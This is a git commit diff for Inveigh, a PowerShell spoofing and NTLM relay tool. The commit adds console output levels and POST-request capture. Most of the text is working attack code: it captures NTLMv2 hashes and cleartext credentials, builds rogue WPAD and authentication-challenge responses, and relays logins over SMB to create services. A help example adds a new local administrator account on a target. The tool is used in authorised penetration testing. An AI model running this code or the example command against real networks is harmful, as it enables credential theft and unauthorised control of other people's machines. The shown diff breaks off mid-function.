aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorKevin Robertson <robertsonk@gmail.com>2017-03-26 23:06:27 -0400
committerKevin Robertson <robertsonk@gmail.com>2017-03-26 23:06:27 -0400
commit2bddbb9413aaad4c0e01c69f3d954f0d8e4cc707 (patch)
tree7fa249cb9a1f01dbba9fb32167e57fcc4a90fd36
parent624cbe44e1610ff54217669e6e00ba74c7ff5717 (diff)
downloadInveigh-2bddbb9413aaad4c0e01c69f3d954f0d8e4cc707.tar.gz
Inveigh-2bddbb9413aaad4c0e01c69f3d954f0d8e4cc707.zip
POST request capture, ConsoleOutput levels, bug fixes
Added additional ConsoleOutput levels. Inveigh.ps1 - Added ability to capture POST requests for use when serving up forms. Added limited ability automatically serve content to browsers during proxy auth attacks.
Diffstat
-rw-r--r--Scripts/Inveigh-Relay.ps1628
-rw-r--r--Scripts/Inveigh.ps1633
2 files changed, 723 insertions, 538 deletions
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index 7a0e1d4..e2ed0bb 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -90,8 +90,16 @@ target.
Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
.PARAMETER ConsoleOutput
-Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
-ensure that it doesn't hang the shell.
+Default = Disabled: (N,Y,Medium,Low) Enable/Disable real time console output. If using this option through a shell, test to
+ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
+
+.PARAMETER ConsoleStatus
+(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+displaying full capture lists when running through a shell that does not have access to the support functions.
+
+.PARAMETER ConsoleUnique
+Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time console output is enabled.
.PARAMETER FileOutput
Default = Disabled: (Y/N) Enable/Disable real time file output.
@@ -128,7 +136,7 @@ PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and
.EXAMPLE
Invoke-Inveigh -HTTP N
-Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Winter2017 /add && net localgroup administrators Inveigh /add"
+Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Spring2017 /add && net localgroup administrators Inveigh /add"
.LINK
https://github.com/Kevin-Robertson/Inveigh
@@ -142,7 +150,8 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
@@ -159,6 +168,7 @@ param
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$Usernames = "",
+ [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
@@ -288,8 +298,28 @@ elseif($Tool -eq 2) # PowerShell Empire
$inveigh.output_stream_only = $true
$inveigh.console_input = $false
$inveigh.newline = "`n"
- $ConsoleOutput = "Y"
$ShowHelp = "N"
+
+ switch ($ConsoleOutput)
+ {
+
+ 'Low'
+ {
+ $ConsoleOutput = "Low"
+ }
+
+ 'Medium'
+ {
+ $ConsoleOutput = "Medium"
+ }
+
+ default
+ {
+ $ConsoleOutput = "Y"
+ }
+
+ }
+
}
else
{
@@ -312,6 +342,7 @@ if($firewall_status)
{
$inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null
}
+
}
if($HTTP -eq 'Y')
@@ -516,10 +547,29 @@ if($SMB1)
$SMB_version = 'SMB1'
}
-if($ConsoleOutput -eq 'Y')
+if($ConsoleOutput -ne 'N')
{
- $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
+
+ if($ConsoleOutput -eq 'Y')
+ {
+ $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
+ }
+ else
+ {
+ $inveigh.status_queue.Add("Real Time Console Output = $ConsoleOutput") > $null
+ }
+
$inveigh.console_output = $true
+
+ if($ConsoleStatus -eq 1)
+ {
+ $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute") > $null
+ }
+ elseif($ConsoleStatus -gt 1)
+ {
+ $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes") > $null
+ }
+
}
else
{
@@ -535,6 +585,15 @@ else
}
+if($ConsoleUnique -eq 'Y')
+{
+ $inveigh.console_unique = $true
+}
+else
+{
+ $inveigh.console_unique = $false
+}
+
if($FileOutput -eq 'Y')
{
$inveigh.status_queue.Add("Real Time File Output = Enabled") > $null
@@ -572,41 +631,19 @@ if($inveigh.status_output)
while($inveigh.status_queue.Count -gt 0)
{
- if($inveigh.output_stream_only)
+ switch -Wildcard ($inveigh.status_queue[0])
{
- Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- $inveigh.status_queue.RemoveAt(0)
- }
- else
- {
-
- switch -Wildcard ($inveigh.status_queue[0])
- {
-
- "* Disabled Due To *"
- {
- Write-Warning($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveAt(0)
- }
- "Run Stop-Inveigh to stop Inveigh-Relay"
- {
- Write-Warning($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveAt(0)
- }
-
- "Windows Firewall = Enabled"
- {
- Write-Warning($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveAt(0)
- }
-
- default
- {
- Write-Output($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveAt(0)
- }
+ {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh-Relay" -or $_ -like "Windows Firewall = Enabled"}
+ {
+ Write-Warning ($inveigh.status_queue[0] + $inveigh.newline)
+ $inveigh.status_queue.RemoveAt(0)
+ }
+ default
+ {
+ Write-Output ($inveigh.status_queue[0] + $inveigh.newline)
+ $inveigh.status_queue.RemoveAt(0)
}
}
@@ -1343,7 +1380,7 @@ $irkin_functions_scriptblock =
$packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName",$packet_service)
$packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask",[Byte[]](0xff,0x01,0x0f,0x00))
$packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType",[Byte[]](0x10,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType",[Byte[]](0x03,0x00,0x00,0x00))
$packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount",$packet_command_length)
$packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
@@ -1794,7 +1831,7 @@ $SMB_relay_response_scriptblock =
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $SCM_data.Length
+ $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
$RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
@@ -2608,11 +2645,6 @@ $HTTP_scriptblock =
{
$HTTP_linger = New-Object System.Net.Sockets.LingerOption($true,0)
$HTTP_listener.Server.LingerState = $HTTP_linger
- $HTTP_WWW_authenticate_header = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # Proxy-Authenticate
- }
- else
- {
- $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # WWW-Authenticate
}
try
@@ -2633,6 +2665,12 @@ $HTTP_scriptblock =
{
$TCP_request = ""
$TCP_request_bytes = New-Object System.Byte[] 4096
+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html")
+ $HTTP_header_cache_control = ""
+ $HTTP_header_authenticate = ""
+ $HTTP_header_authenticate_data = ""
+ $HTTP_message = ""
+ $HTTP_header_authorization = ""
while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
{
@@ -2649,7 +2687,7 @@ $HTTP_scriptblock =
{
$relay_reset++
- if($relay_reset -gt 1)
+ if($relay_reset -gt 2)
{
$inveigh.console_queue.Add("SMB relay attack resetting")
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay attack resetting")])
@@ -2710,17 +2748,13 @@ $HTTP_scriptblock =
if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
{
- $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
- $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-"))
- $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length)
- }
- else
- {
- $authentication_header = ""
+ $HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
+ $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Substring(0,$HTTP_header_authorization_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length)
}
- if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
+ if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous'))
{
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
@@ -2731,10 +2765,12 @@ $HTTP_scriptblock =
if($proxy_listener)
{
$HTTP_response_status_code = 0x34,0x30,0x37
+ $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
}
else
{
$HTTP_response_status_code = 0x34,0x30,0x31
+ $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
}
$HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
@@ -2749,16 +2785,26 @@ $HTTP_scriptblock =
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
+ if($TCP_request -like "*-48-6F-73-74-3A-20-*")
+ {
+ $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 18)
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")])
+ }
+
if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
{
- $HTTP_user_agent = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36)
- $HTTP_user_agent = $HTTP_user_agent.Substring(0,$HTTP_user_agent.IndexOf("-0D-0A-"))
- $HTTP_user_agent = $HTTP_user_agent.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $user_agent = New-Object System.String ($HTTP_user_agent,0,$HTTP_user_agent.Length)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")])
-
- if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$user_agent.contains($_)}))
+ $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36)
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")])
+
+ if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)}))
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")])
@@ -2768,18 +2814,20 @@ $HTTP_scriptblock =
}
- if($authentication_header.startswith('NTLM '))
+ if($HTTP_header_authorization.StartsWith('NTLM '))
{
- $authentication_header = $authentication_header -replace 'NTLM ',''
- [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
+ $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
+ [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
if($proxy_listener)
{
$HTTP_response_status_code = 0x34,0x30,0x37
+ $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
}
else
{
$HTTP_response_status_code = 0x34,0x30,0x31
+ $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
}
if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
@@ -2919,7 +2967,7 @@ $HTTP_scriptblock =
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash)
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
}
else
{
@@ -2949,22 +2997,30 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP " + "(" + $HTTP_NTLM_host_string + ")")])
- $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
$inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP " + "(" + $HTTP_NTLM_host_string + "):`n" + $HTTP_NTLM_hash)
- if($inveigh.file_output)
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+ {
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ }
+ else
+ {
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+ }
+
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
+ $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
$inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
}
+
+ if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ {
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+ }
}
-
- if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
- {
- $inveigh.IP_capture_list += $HTTP_source_IP
- }
}
@@ -3057,63 +3113,52 @@ $HTTP_scriptblock =
}
- if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$user_agent.contains($_)})))
+ if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)})))
{
$HTTP_message = $WPADResponse
- $HTTP_content_type_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") + 0x0d,0x0a
- }
- else
- {
- $HTTP_message = ""
- $HTTP_content_type_header = $null
+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
}
$HTTP_timestamp = Get-Date -format r
$HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
- $HTTP_content_length_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
- $HTTP_content_headers = $HTTP_content_type_header + $HTTP_content_length_header
- $HTTP_message_bytes = 0x0d,0x0a + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
+ $HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
+ $HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth)
{
- $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
-
- $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
- $HTTP_response_status_code +
- 0x20 +
- $HTTP_response_phrase +
- 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
- 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
- 0x0a,0x44,0x61,0x74,0x65,0x3a +
- $HTTP_timestamp +
- 0x0d,0x0a +
- $HTTP_WWW_authenticate_header +
- $NTLM +
- 0x0d,0x0a +
- $HTTP_content_headers +
- 0x0d,0x0a +
- $HTTP_message_bytes
-
+ $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
}
else
{
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
+ }
- $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
- $HTTP_response_status_code +
- 0x20 +
- $HTTP_response_phrase +
- 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
- 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
- 0x0a,0x44,0x61,0x74,0x65,0x3a +
- $HTTP_timestamp +
- 0x0d,0x0a +
- $HTTP_content_headers +
- 0x0d,0x0a +
- $HTTP_message_bytes
+ $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20))
+ $packet_HTTPResponse.Add("HTTPResponse_StatusCode",$HTTP_response_status_code + [Byte[]](0x20))
+ $packet_HTTPResponse.Add("HTTPResponse_ResponsePhrase",$HTTP_response_phrase + [Byte[]](0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_Server",[Byte[]](0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_TimeStamp",[Byte[]](0x44,0x61,0x74,0x65,0x3a,0x20) + $HTTP_timestamp + [Byte[]](0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_ContentLength",$HTTP_header_content_length + [Byte[]](0x0d,0x0a))
+
+ if($HTTP_header_authenticate -and $HTTP_header_authenticate_data)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_AuthenticateHeader",$HTTP_header_authenticate + $HTTP_header_authenticate_data + [Byte[]](0x0d,0x0a))
}
-
+
+ if($HTTP_header_content_type)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_ContentType",$HTTP_header_content_type + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_header_cache_control)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a))
+ }
+
+ $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
+ $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
$HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
$HTTP_stream.Flush()
Start-Sleep -m 10
@@ -3183,6 +3228,7 @@ $control_relay_scriptblock =
if($inveigh.running)
{
+ Start-Sleep -S 1
$inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") > $null
Start-Sleep -S 1
@@ -3195,6 +3241,7 @@ $control_relay_scriptblock =
}
+ Start-Sleep -S 1
$inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") > $null
Start-Sleep -S 1
@@ -3260,6 +3307,12 @@ $control_relay_scriptblock =
$inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
$inveigh.cleartext_file_queue.RemoveAt(0)
}
+
+ while($inveigh.form_input_file_queue.Count -gt 0)
+ {
+ $inveigh.form_input_file_queue[0]|Out-File $inveigh.form_input_out_file -Append
+ $inveigh.form_input_file_queue.RemoveAt(0)
+ }
}
@@ -3367,7 +3420,7 @@ if($HTTPS -eq 'Y')
HTTPSListener
}
-# HTTPS Server Start
+# Proxy Server Start
if($Proxy -eq 'Y')
{
ProxyListener
@@ -3382,61 +3435,152 @@ if($RelayAutoExit -or $RunTime -or $inveigh.file_output)
if($inveigh.console_output)
{
+ if($ConsoleStatus)
+ {
+ $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
:console_loop while($inveigh.relay_running -and $inveigh.console_output)
{
while($inveigh.console_queue.Count -gt 0)
{
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
- else
+ switch -wildcard ($inveigh.console_queue[0])
{
- switch -wildcard ($inveigh.console_queue[0])
+ {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
+ {
+ Write-Warning ($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"}
{
- "* written to *"
+ if($ConsoleOutput -eq 'Y')
{
+ Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
+ }
- if($inveigh.file_output)
- {
- Write-Warning $inveigh.console_queue[0]
- }
+ $inveigh.console_queue.RemoveAt(0)
- $inveigh.console_queue.RemoveAt(0)
- }
+ }
- "* for relay *"
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
{
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
+ Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
}
- "*SMB relay *"
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
+ {
+ Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ }
+
+ if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
+ {
+
+ if($inveigh.cleartext_list.Count -gt 0)
+ {
+ Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
+ $inveigh.cleartext_list.Sort()
+
+ foreach($unique_cleartext in $inveigh.cleartext_list)
+ {
+ if($unique_cleartext -ne $unique_cleartext_last)
{
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
